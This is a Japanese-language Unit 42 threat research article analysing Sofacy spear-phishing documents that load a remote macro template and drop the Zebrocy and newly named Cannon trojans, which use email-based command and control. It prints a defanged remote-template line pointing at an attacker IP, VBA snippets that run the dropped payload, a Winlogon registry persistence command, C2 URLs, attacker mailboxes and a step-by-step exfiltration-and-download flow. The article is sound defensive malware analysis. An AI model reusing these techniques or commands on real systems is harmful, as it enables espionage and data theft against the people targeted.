[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/ "脅威アクター グループ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# Sofacyによる世界的な攻撃が継続、新たに「Cannon」トロイの木馬を観測

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 2 分で読めます  
Related Products  
[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Bryan Lee](https://unit42.paloaltonetworks.com/ja/author/bryanlee/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2018年11月20日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Cannon](https://unit42.paloaltonetworks.com/ja/tag/cannon-ja/)
  * [Sofacy](https://unit42.paloaltonetworks.com/ja/tag/sofacy-ja/)
  * [Zebrocy](https://unit42.paloaltonetworks.com/ja/tag/zebrocy-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/?pdf=download&lg=ja&_wpnonce=c280d701ab "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/?pdf=print&lg=ja&_wpnonce=c280d701ab "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Sofacyによる世界的な攻撃が継続、新たに「Cannon」トロイの木馬を観測&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan%2F&title=Sofacyによる世界的な攻撃が継続、新たに「Cannon」トロイの木馬を観測 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan%2F&text=Sofacyによる世界的な攻撃が継続、新たに「Cannon」トロイの木馬を観測 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Sofacyによる世界的な攻撃が継続、新たに「Cannon」トロイの木馬を観測%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Funit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan%2F "Share in Mastodon")

## 概要

2018年10月後半および11月初め、パロアルトネットワークス脅威インテリジェンスリ調査チームUnit 42が傍受した一連の文書は､悪意のあるマクロを含むテンプレートをリモートからロードする技法で兵器化されていました。

この種類の文書が兵器化されること自体はとくに珍しくありませんが､モジュールを自由に組み換えて使えるという性質上､自動分析システムによるマルウェア判定がより困難になります。この技法の特徴は、実行時にC2サーバーが使用可能でない場合、悪意のあるコードを取得することができず、配信された文書の大半が無害と判定されることです。

この兵器化された文書は、北米やヨーロッパ、旧ソ連の国々を含む、世界各地の政府機関を標的としていました。弊社にとって幸いだったのは、これらの文書のいくつかで使用されたC2サーバーが依然として稼働しており、悪意のあるマクロと後続のペイロードを取得できたことです。分析の結果、第1段階ペイロードとしては､すでによく研究されているトロイの木馬､[Zebrocy](https://blog.paloaltonetworks.com/tag/Zebrocy/)が一貫して利用されていることが明らかになりました。

関連文書を追加収集したところ、第2段階のペイロードも明らかになりました｡弊社はこのペイロードを「Cannon」と命名しています。SofacyグループによるCannonの利用は今回はじめて観測されたもので､電子メールベースのC2通信という新しいチャネルを利用しています。C2チャネルとして電子メールを使用する方法はとりたてて新しい技法ではありませんが、HTTPやHTTPSほど多くは観測されていません。電子メールをC2チャネルとして使用することにより､検出頻度が減る可能性があります。認可されていない電子メール プロバイダ経由で電子メールが送信されても、多くの企業は必ずしも不審に思わず、ましてや悪意のある活動だと思わないためです。

本稿では､弊社が収集した兵器化された多数の文書のうち2つを取り上げて解説します。これら2つの文書は、C2のIPアドレス､作成者名､技法など複数のデータについて､アーティファクト(痕跡)が共通していました。Cannonトロイの木馬に関連した、この拡張された攻撃キャンペーンの詳細については､この後のブログで議論します。

今回分析した2つの文書の1つについて､とくに興味深かったのはcrash list(Lion Air Boeing 737).docxという､航空機事故の一覧資料を装うファイル名が使用されていたことです。ルアー(わな)として最近発生した出来事を使用する攻撃者グループはこのグループが初めてではありませんが、Sofacyがこうした大惨事をエサに注意をひき､攻撃を実行しようとしたことを観測したのは非常に興味深い点です。

### 攻撃の詳細

弊社が傍受した最初のサンプルは、Microsoft Word文書(SHA256: 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f)で、ファイル名はcrash list(Lion Air Boeing 737).docx、作成者名はJoohnでした。この文書は、ヨーロッパで外交問題を扱う政府機関をスピアフィッシングによって標的にしていたと思われます。ユーザーが文書を開こうとすると、Microsoft Wordは悪意のあるマクロおよびペイロードを含むリモート テンプレートを、DOCX文書のsettings.xml.relsファイル内で指定された場所から即座にロードしようとします(以下を参照)。  
\<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://188.241.58\[.\]170/live/owa/office.dotm" TargetMode="External"/\>

|---|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 | \<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://188.241.58\[.\]170/live/owa/office.dotm" TargetMode="External"/\> |

C2がオフラインになっている場合､文書は開けるものの、Wordがリモート テンプレートを取得できないため､マクロはロードされません。この場合､Wordは被害者に同じルアー文書を表示しますが(図2参照)、「Enable Content(コンテンツの有効化)」ボタンを使用してもマクロは有効化できません。

ただし､C2がオンラインの場合、Wordはリモート テンプレート(SHA256: f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5)をロードし、ユーザーに図1のような画面を表示します。

![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-272.png)

*図1 ルアー(おとり)画面*

被害者が「Enable content(コンテンツの有効化)」ボタンをクリックすると、組み込まれたマクロが実行されます。これらの配信文書で使用されるマクロは、AutoClose関数を使用したあまり一般的でない手法を使用します。これは分析を回避する方式の1つで、ユーザーが文書を閉じるまで、Wordは悪意のあるコードを完全には実行しません。自動化されたサンドボックスが、文書が閉じるのを待たずに分析セッションを終了した場合、サンドボックスは悪意のある活動全体を見のがす可能性があります。正常に実行されると、マクロはペイロードをインストールして、文書をシステムに保存します。通常は、被害者に悪意のある活動を気づかれないようにするために、おとり文書がシステムに保存され、後から表示されます。しかし、このケースでは、システムに保存された文書が表示されることはなく、ファイル名にあるようなLion Air(ライオン・エア610便墜落事故)をテーマにした内容は一切含まれていません。マクロは、システムに保存された文書を、UserForm1.Label1.Captionという名前で保存された文書内から取得し、以下に書き込みます。

%TEMP%\\~temp.docm

マクロは、システムに保存されたペイロードを、UserForm1.Label2.Captionという名前で保存された文書内から取得し、以下に書き込みます。

%APPDATA%\\MSDN\\~msdn.exe

このマクロは、興味深い方法でこのペイロードを実行します。つまり、ドロップされた~temp.docm文書をロードし、組み込まれたマクロ内の関数を呼び出してペイロードを実行します。弊社は、この配信文書の作成者が、回避テクニックとして、ドロップされたファイルからペイロードを実行するという手法を選択したものと確信しています。また、最初のマクロがこのドロップされた文書をペイロードの実行に使用するという事実は、文書におとりの内容が一切含まれていないことの説明にもなります。

この機能を実行するために、~temp.docmファイルおよび~msdn.exeファイルをシステムに書き込んだ後、最初のマクロは、~temp.docmファイルをWord文書オブジェクトとしてロードし、~temp.docmファイル内のModule1マクロにあるProc1関数を実行しようとします(以下のコード スニペットを参照)。  
Set WA = CreateObject("Word.Application") WA.Visible = False Set oMyDoc = WA.Documents.Open(vF) WA.Application.Run "Module1.Proc1"

|---------|------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 | Set WA = CreateObject("Word.Application") WA.Visible = False Set oMyDoc = WA.Documents.Open(vF) WA.Application.Run "Module1.Proc1" |

Module1内のProc1関数の役割は、ドロップされたペイロードへの%APPDATA%\\MSDN\\~msdn.exeパスを作成し、組み込みShell関数を使用して実行するだけです(以下のコード スニペットを参照)。  
vAdd = "~msdn" vFileName = Environ("APPDATA") \&amp; "\\MSDN\\" vFileName = vFileName + vAdd \&amp; ".e" + "x" \&amp; "e" Shell vFileName

|---------|--------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 | vAdd = "~msdn" vFileName = Environ("APPDATA") \&amp; "\\MSDN\\" vFileName = vFileName + vAdd \&amp; ".e" + "x" \&amp; "e" Shell vFileName |

システムにドロップされたペイロード(SHA256: 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a)は、Delphiで作成し､UPXでパックされたZebrocyの亜種です。Zebrocyのこの亜種は、[今年初めのZebrocyを使用したSofacyの攻撃](https://blog.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/)に関する弊社の以前の記事で論じたDelphiベースのペイロードと機能的によく似ています。このペイロードの開発者は、以下のURLを使用してC2とやり取りするようにペイロードを構成しました。

hxxp://188.241.58\[.\]170/local/s3/filters.php

Zebrocyトロイの木馬は、システム固有の情報を収集して、上記URLにHTTP POSTリクエストを送信することでその情報をC2サーバーに送信します。他のZebrocyサンプル同様、このトロイの木馬は、システム固有の情報を収集して、コマンド ラインでSYSTEMINFOおよびTASKLISTコマンドを実行し、接続されたストレージ デバイスに関する情報を列挙することで、C2サーバーにその情報を送ります。このZebrocyの特定の亜種は、感染ホストのスクリーンショットもJPEGイメージとしてC2サーバーに送信します。C2サーバーは、ASCII 16進表記でビーコンに2次ペイロードを提供し、トロイの木馬はこれをデコードして、以下の場所に書き込みます。

%APPDATA%\\Roaming\\Audio\\soundfix.exe

弊社による分析中、このC2サーバーは、最初のZebrocyサンプルに機能的に類似した2次ペイロード(SHA256: d18d909ee3eb65dfd49925853553c87f7fd8a40e7cebb0f342e43e0c1fbab7d7)を提供しました。この2次ペイロードもDelphiで作成されており、開発者は以下のURLでHTTPSを使用してC2サーバーと通信するように構成していました。

hxxps://200.122.181\[.\]25/catalog/products/books.php

### 新たなCannonトロイの木馬

弊社が収集した2つめの配信文書は、Joohnという作成者にくわえ､リモート テンプレートをホストするための188.241.58\[.\]170 というC2サーバーのIPアドレスも「crash list(Lion Air Boeing 737).docx」の文書と共通していました。この2つめのサンプルは、最初に分析した文書と構造的には非常に似ていますが、ペイロードはまったく新しいツールであることが判明したので「Cannon」と命名しました。

このツールは、C#で作成されており、悪意のあるコードはcannonという名前のネームスペースに存在します。これが、このトロイの木馬の命名理由です。このトロイの木馬は、主にダウンローダーとして機能し、トロイの木馬とC2サーバー間の通信には電子メールを利用します。C2サーバーと通信するために、トロイの木馬は、特定の電子メール アドレスに、TCPポート587を介してSMTPSによって電子メールを送ります。Cannon固有の機能は、表1を参照してください。また、このツールは、EventHandlersに大きく依存しており、タイマーを使用して特定の順序でメソッドを実行し、回避性能を向上させています。

|--------------|----------------------------------------------|-------------|
| **関数**       | **説明**                                       | **タイマー(秒)** |
| start\_Tick   | 永続性を追加し、一意のシステム固有IDを生成                       | 1           |
| inf\_Tick     | システム情報を収集                                    | 300         |
| screen\_Tick  | デスクトップのスクリーンショットを取得                          | 10          |
| txt\_Tick     | プライマリPOP3アカウントにログインして、セカンダリPOP3アカウントを取得      | 120         |
| load\_Tick    | セカンダリPOP3アカウントにログインして、電子メールの添付ファイルをダウンロード    | 120         |
| subject\_Tick | プライマリPOP3アカウントにログインして、ダウンロードされた添付ファイルへのパスを取得 | 120         |
| run\_Tick     | ダウンロードされた添付ファイルのパスに移動して、添付ファイルでプロセスを作成       | 60          |

*表1 Cannonによって実行される関数とその目的*

Cannonの総体的な目的は、複数の電子メール アカウントを使用してシステム データ(システム情報およびスクリーンショット)を脅威攻撃者に送信し、最終的に攻撃者からの電子メールからペイロードを取得することです。図2の画像は、以下の段階的なプロセスに加えて、Cannonが攻撃者によって制御されたC2電子メール アドレスと通信して、2次ペイロードを取得する方法を示しています。![](https://unit42.paloaltonetworks.com/wp-content/uploads//2020/02/word-image-75.jpeg)

*図2 CannonのC2プロセス フロー*

1. Cannonは、システム情報を収集して、iniという名前のファイルにその情報を保存します。このトロイの木馬は、i.iniというファイルが添付され、本文内にS\_infが指定された、固有のシステムIDを含む件名の電子メールを、以下のアカウントの1つからSMTPS経由でsahro.bella7\[at\]post.czに送信します。
   * Bishtr.cam47
   * Lobrek.chizh
   * Cervot.woprov
2. Cannonは、スクリーンショットを取得して、opsという名前のファイルにスクリーンショットを保存します。このトロイの木馬は、sysscr.opsというファイルが添付され、本文内にSCreenという文字列が指定された、固有のシステムIDを含む件名の電子メールを、前に使用した3つのアカウントの1つからSMTPS経由でsahro.bella7\[at\]post.czに送信します。
3. 攻撃者は、sahro.bella7\[at\]post.czにログインし、トロイの木馬によって送信されたシステム情報とスクリーンショットを処理して、侵害したホストが価値あるものかどうかを判断します。攻撃者が侵害したホストに追加のペイロードをダウンロードしたいと考えた場合、攻撃者は以下の手順で電子メールを送信して対応します。
4. 攻撃者は、固有のシステムIDを件名とし、セカンダリ電子メール アカウントおよび資格情報をASCII 16進フォーマットでメッセージ本文に指定した電子メールをtrala.cosh2\[at\]post.czに送信します。このセカンダリ電子メール アカウントは、現時点では不明なため、後続のステップでは「セカンダリ電子メール アカウント」と呼びます。
5. 攻撃者は、固有のシステムIDを件名とし、2次ペイロードをtxtのファイル名で添付した電子メールをセカンダリ電子メール アカウントに送信します。
6. Cannonは、POP3S経由でtrala.cosh2\[at\]post.czアカウントにログインし、固有のシステムIDに一致する件名の電子メールを探します。Cannonは、正しい件名の電子メールを開き、メッセージ本文の16進データをデコードして、セカンダリ電子メール アカウントを取得します。
7. Cannonは、sahro.bella7\[at\]post.czに電子メールを送信して、セカンダリ電子メール アドレスを受領したことを伝えます。この電子メールは、s.txt ({SysPar = 65}文字列を含む)を添付ファイルとし、本文にokと挿入し、件名として固有のシステムIDを使用して、ステップ1の3つのアカウントの1つからSMTPS経由で送信されます。
8. 攻撃者は、固有のシステムIDを件名とし、Cannonトロイの木馬が2次ペイロードを保存するために使用するファイル パスを含めた電子メールをtrala.cosh2\[at\]post.czに送信します。
9. Cannonは、POP3S経由でセカンダリ電子メール アカウントにログインし、固有のシステムIDに一致する件名の電子メールを探します。Cannonは一致した件名の電子メールを開き、auddevc.txtという名前の添付ファイルを保存します。
10. Cannonは、sahro.bella7\[at\]post.czに電子メールを送信して、ファイルのダウンロードを受領したことを伝えます。この電子メールは、l.txt (090文字列を含む)を添付ファイルとし、本文にok2と挿入し、件名として固有のシステムIDを使用して、ステップ1の3つのアカウントの1つからSMTPS経由で送信されます。
11. Cannonは、POP3S経由でtrala.cosh2\[at\]post.czアカウントにログインし、固有のシステムIDに一致する件名の電子メールを探します。Cannonは一致した件名の電子メールを開き、メッセージ本文内の16進データをデコードして、ダウンロードしたauddevc.txtファイルの移動に使用するファイル パスを取得します。
12. Cannonは、sahro.bella7\[at\]post.czに電子メールを送信して、ファイル パスを受領したことを伝えます。この電子メールは、s.txt ({SysPar = 65}文字列を含む)を添付ファイルとして、本文にok3と挿入し、件名として固有のシステムIDを使用して、ステップ1の3つのアカウントの1つからSMTPS経由で送信されます。
13. Cannonはダウンロードしたファイルを指定されたパスに移動します。
14. Cannonは、sahro.bella7\[at\]post.czに電子メールを送信して、移動が成功したことを伝えます。この電子メールは、l.txt (090文字列を含む)を添付ファイルとし、本文にok4と挿入し、件名として固有のシステムIDを使用して、ステップ1の3つのアカウントの1つからSMTPS経由で送信されます。
15. Cannonはダウンロードしたファイルを、指定されたパスから実行します。
16. Cannonは、sahro.bella7\[at\]post.czに電子メールを送信して、実行が成功したことを伝えます。この電子メールは、s.txt ({SysPar = 65}文字列を含む)を添付ファイルとし、本文にok5と挿入し、件名として固有のシステムIDを使用して、ステップ1の3つのアカウントの1つからSMTPS経由で送信されます。

Cannonの詳細な分析については、「付録」を参照してください。

## 結論

Sofacy脅威グループは、依然として欧州、米国、および旧ソビエトの国々の政府組織を標的にしており､攻撃のペイロードにはZebrocyツールが継続的に利用されています。これらの攻撃で、Zebrocyのインストールに使用された配信文書では、リモート テンプレートが使用されていました。マクロが有効な文書は稼働中のC2サーバーからしか取得できないことから、リモート テンプレートを使用した攻撃の分析はより困難です。また、Sofacyグループは、これらの攻撃の1つで先日のLion Airの惨事をルアー(わな)として使用していました。ここでも、最新イベントをソーシャル エンジニアリング テーマで積極的に使用しようとする姿勢が表れています。

注目すべき点として､SofacyグループがCannonという新しいトロイの木馬の配信に、これらと非常によく似た配信文書を使用していることがあげられます。Cannonは、SMTPSおよびPOP3SをC2チャネルとして使用しますが、Zebrocyはより一般的に確認されているHTTPまたはHTTPSベースのC2を使用します。これはとくに目新しい技法ではありませんが、より効果的に検出を回避できる可能性があります。というのは､関連する外部ホストが正規の電子メール サービス プロバイダだからです。また､SMTPSプロトコルおよびPOP3Sプロトコルは､正規のWebベース サービスに暗号化も提供することから、C2チャネルのブロックはきわめて難しくなります。

SofacyのZebrocyおよびCannonの配信キャンペーンは引き続き活発ですが、パロアルトネットワークスのお客様は、この脅威から以下に示す方法で保護されています。

* AutoFocusをご使用のお客様は、[Zebrocy](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Zebrocy)および[Cannon](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Cannon)で、これらのサンプルについて調べることができます。
* WildFireは、本稿で説明した、悪意があると判断した配信文書、ZebrocyおよびCannonのペイロードを検出します。
* Trapsは、マクロが含まれるリモート テンプレートを「Suspicious macro detected (不審なマクロを検出した)」としてブロックし、ZebrocyおよびCannonのペイロードを「Suspicious executable detected (疑わしい実行可能ファイルを検出した)」としてブロックします。
* これらの攻撃でリモート テンプレートとC2サービスをホストしているIPアドレスは、「コマンド\&コントロール」と分類されます。

## IOC

### 配信のハッシュ

2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f  
af77e845f1b0a3ae32cb5cfa53ff22cc9dae883f05200e18ad8e10d7a8106392

### リモート テンプレートのハッシュ

f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5  
fc69fb278e12fc7f9c49a020eff9f84c58b71e680a9e18f78d4e6540693f557d

### リモート テンプレート

hxxp://188.241.58\[.\]170/live/owa/office.dotm

### Zebrocyのハッシュ

6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a

### Zebrocy C2のURL

hxxp://188.241.58\[.\]170/local/s3/filters.php

hxxps://200.122.181\[.\]25/catalog/products/books.php

### Cannonのハッシュ

61a1f3b4fb4dbd2877c91e81db4b1af8395547eab199bf920e9dd11a1127221e

### Cannonの電子メール アカウント

sahro.bella7\[at\]post.cz  
trala.cosh2\[at\]post.cz  
bishtr.cam47\[at\]post.cz  
lobrek.chizh\[at\]post.cz  
cervot.woprov\[at\]post.cz

## 付録

Cannonトロイの木馬はC#言語で記述され、主に、このトロイの木馬とC2サーバー間を通信する電子メールに依存するダウンローダーとして機能します。C2サーバーと通信するために、このトロイの木馬は、特定の電子メール アドレスに、TCPポート587を介したSMTPS経由で電子メールを送信します。このツールでは、次のような特定の順序で実行されるさまざまな機能が使用されます。

* システム情報とスクリーンショットを収集する
* 収集した情報を電子メールで攻撃者に送信する
* 受信ボックスをチェックして、攻撃者からペイロードが添付された電子メールが送られていないか確認する
* 電子メールに添付されているペイロードをダウンロードする
* ダウンロードしたペイロードを実行する

これらの活動を実行するために呼び出される関数は次のとおりです。

### **start\_Tick**

この関数は、文字列{SysPar = 65}をs.txtというファイルに記述することから始めます。このファイルは、このトロイの木馬の実行全体を通してC2通信で使用されます。この関数は、以下のコマンドをr.batに記述して実行することで永続性を確保する責任も担っています。

REG ADD "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" /v Shell /t REG\_SZ /d \[path to wsslc.exe\]

また、C2通信でメッセージの送受信に使用する一意のシステム固有IDも作成します。このシステム固有IDは、16文字で構成された文字列で、このトロイの木馬がCボリュームのシリアル番号とEnvironment.UserNameの先頭の4つの16進バイトを使用して作成します。次に、start\_Tick関数が、inf\_Tickメソッドを実行するためのタイマーを開始します。

### **inf\_Tick**

以下のようなシステム情報を収集して、i.iniファイルに保存する処理を担当します。

* Application.ExecutablePath
* Environment.OSVersion
* Environment.SystemDirectory
* Environment.UserDomainName
* Environment.MachineName
* Environment.UserName
* TimeZone.CurrentTimeZone.StandardName
* Environment.TickCount
* DriveInfo.GetDrives() -- Name,VolumeLabel,DriveFormat,DriveType,TotalSize,AvailableFreeSpace,Serial number
* Folders in C:\\Program Files\\
* Folders in C:\\Program Files (x86)\\
* Process.GetProcesses

この関数は、前述の認証資格情報を使用してSMTPサーバーにログインし、i.iniファイルをC2電子メール アドレスに送信します。この情報を盗み出すために送信される電子メールには、i.iniが添付され、件名として固有のシステムIDが使用され、電子メール メッセージの本文にS\_infが挿入されます。次に、inf\_Tick関数が、screen\_Tickメソッドを実行するためのタイマーを開始します。

### **screen\_Tick**

デスクトップのスクリーンショットを取得して、sysscr.opsというファイルに保存します。前述の認証資格情報を使用してSMTPサーバーにログインし、sysscr.opsファイルをC2電子メール アドレスに送信します。この情報を盗み出すために送信される電子メールには、sysscr.opsファイルが添付され、件名として固有のシステムIDが使用され、電子メール メッセージの本文にSCreenが挿入されます。次に、screen\_Tick関数が、txt\_Tickメソッドを実行するためのタイマーを開始します。

### **txt\_Tick**

このトロイの木馬は、アカウント名trala.cosh2\[at\]post.czを使用してPOP3S経由でpop.seznam\[.\]czにログインしようとします。ログインに成功すると、このトロイの木馬は、受信ボックス内のメッセージにアクセスして、固有のシステムIDに一致する件名の電子メールを探します。そのような電子メールが見つかると、このトロイの木馬は、その電子メールの本文を16進フォーマットとして扱い、後でload\_Tick関数によって使用される変数に保存します。これらの電子メールは、読み取りと処理が終わった後にトロイの木馬によって削除されます。

このトロイの木馬が電子メールからこのテキストを取得した場合、前述の認証資格情報を使用してSMTPサーバーにログインし、s.txtファイルをC2電子メール アドレスに送信します。この情報を盗み出すために送信される電子メールには、s.txtファイルが添付され、件名として固有のシステムIDが使用され、電子メール メッセージの本文に文字列okが挿入されます。次に、txt\_Tick関数が、load\_Tickメソッドを実行するためのタイマーを開始します。

### **load\_Tick**

このトロイの木馬はまず、txt\_Tick関数で電子メールから取得したテキストからB\&およびDbのオカレンスをすべて削除します。次に、残りのテキストを文字%で分割し、文字%の左側のコンテンツをアカウント名、右側のコンテンツをパスワードとして扱います。このトロイの木馬はこれらの資格情報を使用して、POP3S経由でpop.seznam\[.\]czの別の電子メール アカウントにログインして、件名として固有のシステムIDを持つ電子メール メッセージがないか確認します。次に、該当する件名の電子メールを解析して、添付文書を取得します。名前に文字列auddevcが含まれる添付文書があれば、それをシステムに保存します。これは、auddevc.txtというファイルをダウンロードすることを意図しています。このトロイの木馬は、文字列090を記述するためのl.txtというファイルも作成します。

このトロイの木馬が電子メールからこのファイルを取得した場合、前述の認証資格情報を使用してSMTPサーバーにログインし、l.txtファイルをC2電子メール アドレスに送信します。この情報を盗み出すために送信される電子メールには、l.txtファイルが添付され、件名として固有のシステムIDが使用され、電子メール メッセージの本文にok2が挿入されます。次に、load\_Tick関数が、subject\_Tickメソッドを実行するためのタイマーを開始します。

### **subject\_Tick**

この関数は、機能的にtxt\_Tick関数とよく似ています。txt\_Tick関数の場合と同様に、このトロイの木馬はアカウント名trala.cosh2@post\[.\]czを使用してPOP3S経由でpop.seznam\[.\]czにログインしようとします。そしてここでも受信ボックスで、件名として固有のシステムIDを持つ電子メールを探します。次に、電子メール本文を16進データとして扱い、run\_Tick関数によって使用される変数に保存します。この変数に保存されたコンテンツは、load\_Tick関数で保存されたファイルの移動先のパスで、攻撃者がそこからファイルを実行しようとしていると考えられます。

このトロイの木馬が電子メールからこのテキストを取得した場合、前述の認証資格情報を使用してSMTPサーバーにログインし、s.txtファイルをC2電子メール アドレスに送信します。この情報を盗み出すために送信される電子メールには、s.txtファイルが添付され、件名として固有のシステムIDが使用され、電子メール メッセージの本文にok3が挿入されます。次に、subject\_Tick関数が、run\_Tickメソッドを実行するためのタイマーを開始します。

### **run\_Tick**

このトロイの木馬は、まず、subject\_Tick関数で電子メールから取得したパス内にディレクトリーを作成しようとします。次に、load\_Tick関数でダウンロードしたauddevc.txtファイルを新しく作成したディレクトリーに移動しようとします。このファイルの移動に成功すると、前述の認証資格情報を使用してSMTPサーバーにログインし、l.txtファイルをC2電子メール アドレスに送信します。この情報を盗み出すために送信される電子メールには、l.txtファイルが添付され、件名として固有のシステムIDが使用され、電子メール メッセージの本文にok4が挿入されます。

次に、新しく移動したダウンロード ファイルを使用してプロセスを作成しようとします。このダウンロード ファイルの実行に成功すると、前述の認証資格情報を使用してSMTPサーバーにログインし、s.txtファイルをC2電子メール アドレスに送信します。この情報を盗み出すために送信される電子メールには、s.txtファイルが添付され、件名として固有のシステムIDが使用され、電子メール メッセージの本文にok5が挿入されます。次に、sysscr.opsスクリーンショット ファイルとi.iniシステム情報ファイルを削除してから、終了します。

トップに戻る

### タグ

* [Cannon](https://unit42.paloaltonetworks.com/ja/tag/cannon-ja/ "Cannon")
* [Sofacy](https://unit42.paloaltonetworks.com/ja/tag/sofacy-ja/ "Sofacy")
* [Zebrocy](https://unit42.paloaltonetworks.com/ja/tag/zebrocy-ja/ "Zebrocy")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:テスト､兵器化、配信までのOilRigの作戦実行スピードを分析](https://unit42.paloaltonetworks.com/ja/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/ "テスト､兵器化、配信までのOilRigの作戦実行スピードを分析")

### 目次

* 

### 関連記事

* [『攻撃者のプレイブック』に新たに 11 グループを追加](https://unit42.paloaltonetworks.com/ja/unveiling-11-new-adversary-playbooks/ "article - table of contents")
